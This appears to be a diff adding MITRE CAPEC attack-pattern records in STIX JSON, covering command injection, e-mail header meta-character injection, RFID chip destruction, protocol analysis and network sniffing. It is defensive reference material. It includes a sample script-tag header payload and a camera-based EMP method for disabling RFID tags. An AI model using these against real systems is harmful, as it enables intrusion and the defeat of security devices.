+ "Input filtering and validating is not done properly leaving the door open to harmful characters for the target host."
164
+ ],
165
+ "x_capec_skills_required": {
166
+ "Low": "An attacker can inject different representation of a filtered character in UTF-8 format.",
167
+ "Medium": "An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host."
168
+ },
169
+ "x_capec_status": "Draft",
170
+ "x_capec_typical_severity": "High",
171
+ "x_capec_version": "3.9"
172
+ }
173
+ ],
174
+ "spec_version": "2.0",
175
+ "type": "bundle"
176
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2f50c4ba-bba9-456b-8fc3-7a551ed4c65f.json ADDED
@@ -0,0 +1,29 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--21a18a3e-7a7b-4d48-9d53-a2b98d36db34",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-211",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/211.html"
13
+ }
14
+ ],
15
+ "id": "attack-pattern--2f50c4ba-bba9-456b-8fc3-7a551ed4c65f",
16
+ "modified": "2018-07-31T00:00:00.000Z",
17
+ "name": "DEPRECATED: Leveraging web tools (e.g. Mozilla's GreaseMonkey, Firebug) to change application behavior",
18
+ "object_marking_refs": [
19
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
20
+ ],
21
+ "type": "attack-pattern",
22
+ "x_capec_abstraction": "Detailed",
23
+ "x_capec_status": "Deprecated",
24
+ "x_capec_version": "3.9"
25
+ }
26
+ ],
27
+ "spec_version": "2.0",
28
+ "type": "bundle"
29
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2fb09678-092a-490d-b2da-fff20a696219.json ADDED
@@ -0,0 +1,29 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--73dedde2-f041-4540-b410-69d893c50f1a",
3
+ "objects": [
4
+ {
5
+ "created": "2015-11-09T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack pattern has been deprecated.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-602",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/602.html"
13
+ }
14
+ ],
15
+ "id": "attack-pattern--2fb09678-092a-490d-b2da-fff20a696219",
16
+ "modified": "2017-05-01T00:00:00.000Z",
17
+ "name": "DEPRECATED: Degradation",
18
+ "object_marking_refs": [
19
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
20
+ ],
21
+ "type": "attack-pattern",
22
+ "x_capec_abstraction": "Meta",
23
+ "x_capec_status": "Deprecated",
24
+ "x_capec_version": "3.9"
25
+ }
26
+ ],
27
+ "spec_version": "2.0",
28
+ "type": "bundle"
29
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f.json ADDED
@@ -0,0 +1,73 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--6f84a48e-0a56-46ed-8b43-d1b59b46a6f5",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary looking to execute a command of their choosing, injects new items into an existing command thus modifying interpretation away from what was intended. Commands in this context are often standalone strings that are interpreted by a downstream component and cause specific responses. This type of attack is possible when untrusted values are used to build these command strings. Weaknesses in input validation or command construction can enable the attack and lead to successful exploitation.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-248",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/248.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-77",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/77.html"
18
+ },
19
+ {
20
+ "description": "Command Injection",
21
+ "source_name": "OWASP Attacks",
22
+ "url": "https://owasp.org/www-community/attacks/Command_Injection"
23
+ },
24
+ {
25
+ "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)",
26
+ "external_id": "REF-615",
27
+ "source_name": "reference_from_CAPEC",
28
+ "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.html"
29
+ }
30
+ ],
31
+ "id": "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f",
32
+ "modified": "2020-12-17T00:00:00.000Z",
33
+ "name": "Command Injection",
34
+ "object_marking_refs": [
35
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
36
+ ],
37
+ "type": "attack-pattern",
38
+ "x_capec_abstraction": "Meta",
39
+ "x_capec_consequences": {
40
+ "Availability": [
41
+ "Execute Unauthorized Commands (A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data.)"
42
+ ],
43
+ "Confidentiality": [
44
+ "Execute Unauthorized Commands (A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data.)"
45
+ ],
46
+ "Integrity": [
47
+ "Execute Unauthorized Commands (A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data.)"
48
+ ]
49
+ },
50
+ "x_capec_domains": [
51
+ "Software"
52
+ ],
53
+ "x_capec_likelihood_of_attack": "Medium",
54
+ "x_capec_parent_of_refs": [
55
+ "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05",
56
+ "attack-pattern--f2fe393c-54a7-424e-b5d8-e461942ca0f8",
57
+ "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716",
58
+ "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2",
59
+ "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e",
60
+ "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e",
61
+ "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3"
62
+ ],
63
+ "x_capec_prerequisites": [
64
+ "The target application must accept input from the user and then use this input in the construction of commands to be executed. In virtually all cases, this is some form of string input that is concatenated to a constant string defined by the application to form the full command to be executed."
65
+ ],
66
+ "x_capec_status": "Stable",
67
+ "x_capec_typical_severity": "High",
68
+ "x_capec_version": "3.9"
69
+ }
70
+ ],
71
+ "spec_version": "2.0",
72
+ "type": "bundle"
73
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1.json ADDED
@@ -0,0 +1,81 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--f9ddcf03-2042-4711-80ef-c76f4086bb10",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-41",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/41.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-150",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/150.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-88",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/88.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-697",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/697.html"
28
+ },
29
+ {
30
+ "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
31
+ "external_id": "REF-1",
32
+ "source_name": "reference_from_CAPEC"
33
+ }
34
+ ],
35
+ "id": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1",
36
+ "modified": "2022-09-29T00:00:00.000Z",
37
+ "name": "Using Meta-characters in E-mail Headers to Inject Malicious Payloads",
38
+ "object_marking_refs": [
39
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
40
+ ],
41
+ "type": "attack-pattern",
42
+ "x_capec_abstraction": "Detailed",
43
+ "x_capec_child_of_refs": [
44
+ "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128",
45
+ "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65"
46
+ ],
47
+ "x_capec_consequences": {
48
+ "Availability": [
49
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
50
+ ],
51
+ "Confidentiality": [
52
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
53
+ ],
54
+ "Integrity": [
55
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
56
+ ]
57
+ },
58
+ "x_capec_domains": [
59
+ "Software",
60
+ "Software"
61
+ ],
62
+ "x_capec_example_instances": [
63
+ "\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">To:<someone@example.com>From:<badguy@example.com>Header<SCRIPT>payme</SCRIPT>def: whatever</xhtml:div>\n ",
64
+ "\n <xhtml:p>Meta-characters are among the most valuable tools attackers have to deceive users into taking some action on their behalf. E-mail is perhaps the most efficient and cost effective attack distribution tool available, this has led to the phishing pandemic.</xhtml:p>\n <xhtml:p>Meta-characters like \\w \\s \\d ^ can allow the attacker to escape out of the expected behavior to execute additional commands. Escaping out the process (such as email client) lets the attacker run arbitrary code in the user's process.</xhtml:p>\n "
65
+ ],
66
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Experiment</h3><ol><li> <p> <b>Identify and characterize metacharacter-processing vulnerabilities in email headers: </b>An attacker creates emails with headers containing various metacharacter-based malicious payloads in order to determine whether the target application processes the malicious content and in what manner it does so.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use an automated tool (fuzzer) to create malicious emails headers containing metacharacter-based payloads.</td></tr><tr><td>Manually tampering email headers to inject malicious metacharacter-based payload content in them.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p>An attacker leverages vulnerabilities identified during the Experiment Phase to inject malicious email headers and cause the targeted email application to exhibit behavior outside of its expected constraints.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Send emails with specifically-constructed, metacharacter-based malicious payloads in the email headers to targeted systems running email processing applications identified as vulnerable during the Experiment Phase.</td></tr></tbody></table></ol></div>",
67
+ "x_capec_likelihood_of_attack": "High",
68
+ "x_capec_prerequisites": [
69
+ "This attack targets most widely deployed feature rich email applications, including web based email programs."
70
+ ],
71
+ "x_capec_skills_required": {
72
+ "Low": "To distribute email"
73
+ },
74
+ "x_capec_status": "Draft",
75
+ "x_capec_typical_severity": "High",
76
+ "x_capec_version": "3.9"
77
+ }
78
+ ],
79
+ "spec_version": "2.0",
80
+ "type": "bundle"
81
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93.json ADDED
@@ -0,0 +1,41 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--ff34eaf7-01e2-468f-8940-50b7fe022ce6",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An attacker uses methods to deactivate a passive RFID tag for the purpose of rendering the tag, badge, card, or object containing the tag unresponsive. RFID tags are used primarily for access control, inventory, or anti-theft devices. The purpose of attacking the RFID chip is to disable or damage the chip without causing damage to the object housing it.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-400",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/400.html"
13
+ },
14
+ {
15
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
16
+ "external_id": "REF-33",
17
+ "source_name": "reference_from_CAPEC"
18
+ }
19
+ ],
20
+ "id": "attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93",
21
+ "modified": "2022-02-22T00:00:00.000Z",
22
+ "name": "RFID Chip Deactivation or Destruction",
23
+ "object_marking_refs": [
24
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
25
+ ],
26
+ "type": "attack-pattern",
27
+ "x_capec_abstraction": "Detailed",
28
+ "x_capec_child_of_refs": [
29
+ "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b"
30
+ ],
31
+ "x_capec_domains": [
32
+ "Physical Security"
33
+ ],
34
+ "x_capec_extended_description": "\n <xhtml:p>When correctly performed the RFID chip can be disabled or destroyed without visible damage or marking to whatever item or device containing the chip. Attacking the chip directly allows for the security device or method to be bypassed without directly damaging the device itself, such as an alarm system or computer system. Various methods exist for damaging or deactivating RFID tags. For example, most common RFID chips can be permanently destroyed by creating a small electromagnetic pulse near the chip itself. One method employed requires the modifying a disposable camera by disconnecting the flash bulb and soldering a copper coil to the capacitor. Firing the camera in this configuration near any RFID chip-based device creates an EMP pulse sufficient to destroy the chip without leaving evidence of tampering. So far this attack has been demonstrated to work against RFID chips in the 13.56 MHz range.</xhtml:p>\n ",
35
+ "x_capec_status": "Draft",
36
+ "x_capec_version": "3.9"
37
+ }
38
+ ],
39
+ "spec_version": "2.0",
40
+ "type": "bundle"
41
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--30b081a0-bf20-432b-8211-a340bbd04731.json ADDED
@@ -0,0 +1,74 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--b4e26f47-219f-4d77-9990-ef2f08e36e7e",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary engages in activities to decipher and/or decode protocol information for a network or application communication protocol used for transmitting information between interconnected nodes or systems on a packet-switched data network. While this type of analysis involves the analysis of a networking protocol inherently, it does not require the presence of an actual or physical network.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-192",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/192.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-326",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/326.html"
18
+ },
19
+ {
20
+ "description": "Wikipedia, The Wikimedia Foundation, Inc",
21
+ "external_id": "REF-57",
22
+ "source_name": "reference_from_CAPEC",
23
+ "url": "http://en.wikipedia.org/wiki/Proprietary_protocol"
24
+ },
25
+ {
26
+ "description": "Wikipedia, The Wikimedia Foundation, Inc",
27
+ "external_id": "REF-50",
28
+ "source_name": "reference_from_CAPEC",
29
+ "url": "http://en.wikipedia.org/wiki/Reverse_engineering"
30
+ }
31
+ ],
32
+ "id": "attack-pattern--30b081a0-bf20-432b-8211-a340bbd04731",
33
+ "modified": "2022-02-22T00:00:00.000Z",
34
+ "name": "Protocol Analysis",
35
+ "object_marking_refs": [
36
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
37
+ ],
38
+ "type": "attack-pattern",
39
+ "x_capec_abstraction": "Meta",
40
+ "x_capec_consequences": {
41
+ "Confidentiality": [
42
+ "Read Data (Successful deciphering of protocol information compromises the confidentiality of future sensitive communications.)"
43
+ ],
44
+ "Integrity": [
45
+ "Modify Data (Modifying communications after successful deciphering of protocol information compromises integrity.)"
46
+ ]
47
+ },
48
+ "x_capec_domains": [
49
+ "Communications",
50
+ "Hardware"
51
+ ],
52
+ "x_capec_extended_description": "\n <xhtml:p>Although certain techniques for protocol analysis benefit from manipulating live 'on-the-wire' interactions between communicating components, static or dynamic analysis techniques applied to executables as well as to device drivers, such as network interface drivers, can also be used to reveal the function and characteristics of a communication protocol implementation. Depending upon the methods used the process may involve observing, interacting, and modifying actual communications occurring between hosts. The goal of protocol analysis is to derive the data transmission syntax, as well as to extract the meaningful content, including packet or content delimiters used by the protocol. This type of analysis is often performed on closed-specification protocols, or proprietary protocols, but is also useful for analyzing publicly available specifications to determine how particular implementations deviate from published specifications.</xhtml:p>\n ",
53
+ "x_capec_likelihood_of_attack": "Low",
54
+ "x_capec_parent_of_refs": [
55
+ "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f"
56
+ ],
57
+ "x_capec_prerequisites": [
58
+ "Access to a binary executable.",
59
+ "The ability to observe and interact with a communication channel between communicating processes."
60
+ ],
61
+ "x_capec_resources_required": [
62
+ "Depending on the type of analysis, a variety of tools might be required, such as static code and/or dynamic analysis tools. Alternatively, the effort might require debugging programs such as ollydbg, SoftICE, or disassemblers like IDA Pro. In some instances, packet sniffing or packet analyzing programs such as TCP dump or Wireshark are necessary. Lastly, specific protocol analysis might require tools such as PDB (Protocol Debug), or packet injection tools like pcap or Nemesis."
63
+ ],
64
+ "x_capec_skills_required": {
65
+ "High": "Knowlegde of the Open Systems Interconnection model (OSI model), and famililarity with Wireshark or some other packet analyzer."
66
+ },
67
+ "x_capec_status": "Stable",
68
+ "x_capec_typical_severity": "Low",
69
+ "x_capec_version": "3.9"
70
+ }
71
+ ],
72
+ "spec_version": "2.0",
73
+ "type": "bundle"
74
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c.json ADDED
@@ -0,0 +1,66 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--b91f09d7-e16c-4863-9ead-94eed2cdd40b",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary with access to system components during allocated baseline development can substitute a maliciously altered hardware component for a baseline component during the product development and research phases. This can lead to adjustments and calibrations being made in the product so that when the final product, now containing the modified component, is deployed it will not perform as designed and be advantageous to the adversary.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-516",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/516.html"
13
+ },
14
+ {
15
+ "description": "Supply Chain Compromise: Compromise Hardware Supply Chain",
16
+ "external_id": "T1195.003",
17
+ "source_name": "ATTACK",
18
+ "url": "https://attack.mitre.org/wiki/Technique/T1195/003"
19
+ },
20
+ {
21
+ "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation",
22
+ "external_id": "REF-439",
23
+ "source_name": "reference_from_CAPEC",
24
+ "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf"
25
+ },
26
+ {
27
+ "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft",
28
+ "external_id": "REF-712",
29
+ "source_name": "reference_from_CAPEC",
30
+ "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/"
31
+ }
32
+ ],
33
+ "id": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c",
34
+ "modified": "2022-09-29T00:00:00.000Z",
35
+ "name": "Hardware Component Substitution During Baselining",
36
+ "object_marking_refs": [
37
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
38
+ ],
39
+ "type": "attack-pattern",
40
+ "x_capec_abstraction": "Detailed",
41
+ "x_capec_child_of_refs": [
42
+ "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d"
43
+ ],
44
+ "x_capec_domains": [
45
+ "Supply Chain",
46
+ "Hardware"
47
+ ],
48
+ "x_capec_example_instances": [
49
+ "\n <xhtml:p>An adversary supplies the product development facility of a network security device with a hardware component that is used to simulate large volumes of network traffic. The device claims in logs, stats, and via the display panel to be pumping out very large quantities of network traffic, when it is in fact putting out very low volumes. The developed product is adjusted and configured to handle what it believes to be a heavy network load, but when deployed at the victim site the large volumes of network traffic are dropped instead of being processed by the network security device. This allows the adversary an advantage when attacking the victim in that the adversary's presence may not be detected by the device.</xhtml:p>\n "
50
+ ],
51
+ "x_capec_likelihood_of_attack": "Low",
52
+ "x_capec_prerequisites": [
53
+ "The adversary will need either physical access or be able to supply malicious hardware components to the product development facility."
54
+ ],
55
+ "x_capec_skills_required": {
56
+ "High": "Resources to physically infiltrate supplier.",
57
+ "Medium": "Intelligence data on victim's purchasing habits."
58
+ },
59
+ "x_capec_status": "Draft",
60
+ "x_capec_typical_severity": "High",
61
+ "x_capec_version": "3.9"
62
+ }
63
+ ],
64
+ "spec_version": "2.0",
65
+ "type": "bundle"
66
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4.json ADDED
@@ -0,0 +1,95 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--c0206924-e909-418f-bc02-5556053e8219",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-65",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/65.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-319",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/319.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-311",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/311.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-318",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/318.html"
28
+ },
29
+ {
30
+ "external_id": "CWE-693",
31
+ "source_name": "cwe",
32
+ "url": "http://cwe.mitre.org/data/definitions/693.html"
33
+ },
34
+ {
35
+ "description": "Network Sniffing",
36
+ "external_id": "T1040",
37
+ "source_name": "ATTACK",
38
+ "url": "https://attack.mitre.org/wiki/Technique/T1040"
39
+ }
40
+ ],
41
+ "id": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4",
42
+ "modified": "2022-09-29T00:00:00.000Z",
43
+ "name": "Sniff Application Code",
44
+ "object_marking_refs": [
45
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
46
+ ],
47
+ "type": "attack-pattern",
48
+ "x_capec_abstraction": "Detailed",
49
+ "x_capec_can_precede_refs": [
50
+ "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8"
51
+ ],
52
+ "x_capec_child_of_refs": [
53
+ "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec"
54
+ ],
55
+ "x_capec_consequences": {
56
+ "Access_Control": [
57
+ "Gain Privileges"
58
+ ],
59
+ "Authorization": [
60
+ "Gain Privileges"
61
+ ],
62
+ "Confidentiality": [
63
+ "Read Data",
64
+ "Gain Privileges"
65
+ ]
66
+ },
67
+ "x_capec_domains": [
68
+ "Communications",
69
+ "Software"
70
+ ],
71
+ "x_capec_example_instances": [
72
+ "Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. The attacker then proceeds to reverse engineer the captured stream to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc..",
73
+ "Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such."
74
+ ],
75
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Set up a sniffer: </b>The adversary sets up a sniffer in the path between the server and the client and watches the traffic.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>The adversary sets up a sniffer in the path between the server and the client.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p>[Capturing Application Code Bound During Patching]adversary knows that the computer/OS/application can request new applications to install, or it periodically checks for an available update. The adversary loads the sniffer set up during Explore phase, and extracts the application code from subsequent communication. The adversary then proceeds to reverse engineer the captured code.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>adversary loads the sniffer to capture the application code bound during a dynamic update.</td></tr><tr><td>The adversary proceeds to reverse engineer the captured code.</td></tr></tbody></table></ol></div>",
76
+ "x_capec_likelihood_of_attack": "Low",
77
+ "x_capec_prerequisites": [
78
+ "The attacker must have the ability to place themself in the communication path between the client and server.",
79
+ "The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts.",
80
+ "The attacker must be able to employ a sniffer on the network without being detected."
81
+ ],
82
+ "x_capec_resources_required": [
83
+ "\n <xhtml:p>The Attacker needs the ability to capture communications between the client being updated and the server providing the update.</xhtml:p>\n <xhtml:p>In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client.</xhtml:p>\n "
84
+ ],
85
+ "x_capec_skills_required": {
86
+ "Medium": "The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ an adversary-in-the-middle attack (CAPEC-94), the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be."
87
+ },
88
+ "x_capec_status": "Draft",
89
+ "x_capec_typical_severity": "High",
90
+ "x_capec_version": "3.9"
91
+ }
92
+ ],
93
+ "spec_version": "2.0",
94
+ "type": "bundle"
95
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--3190ba0e-d2d1-4007-985d-5f3aa517aaed.json ADDED
@@ -0,0 +1,79 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--08e4681e-b27c-4b0a-8586-c88b96985f10",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This OS fingerprinting probe analyzes the IP 'ID' field sequence number generation algorithm of a remote host. Operating systems generate IP 'ID' numbers differently, allowing an attacker to identify the operating system of the host by examining how is assigns ID numbers when generating response packets. RFC 791 does not specify how ID numbers are chosen or their ranges, so ID sequence generation differs from implementation to implementation. There are two kinds of IP 'ID' sequence number analysis - IP 'ID' Sequencing: analyzing the IP 'ID' sequence generation algorithm for one protocol used by a host and Shared IP 'ID' Sequencing: analyzing the packet ordering via IP 'ID' values spanning multiple protocols, such as between ICMP and TCP.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-317",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/317.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-200",
16
